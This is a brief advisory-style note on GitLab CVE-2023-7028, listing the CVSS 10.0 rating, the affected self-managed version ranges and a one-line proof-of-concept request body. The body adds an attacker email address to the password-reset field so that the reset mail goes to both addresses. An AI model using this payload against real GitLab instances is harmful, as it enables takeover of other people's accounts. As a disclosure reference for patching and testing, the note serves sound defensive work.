# Gitlab - CVE-2023-7028

Tracked as CVE-2023-7028, the flaw has been awarded the maximum severity of **10.0** on the CVSS scoring system and could facilitate <mark style="color:red;">**account takeover**</mark> by sending password reset emails to an unverified email address. It affects all self-managed instances of GitLab Community Edition (CE) and Enterprise Edition (EE):

* 16.1 prior to 16.1.6
* 16.2 prior to 16.2.9
* 16.3 prior to 16.3.7
* 16.4 prior to 16.4.5
* 16.5 prior to 16.5.6
* 16.6 prior to 16.6.4
* 16.7 prior to 16.7.2

POC:

```http
user[email][]=valid@email.com&user[email][]=attacker@email.com
```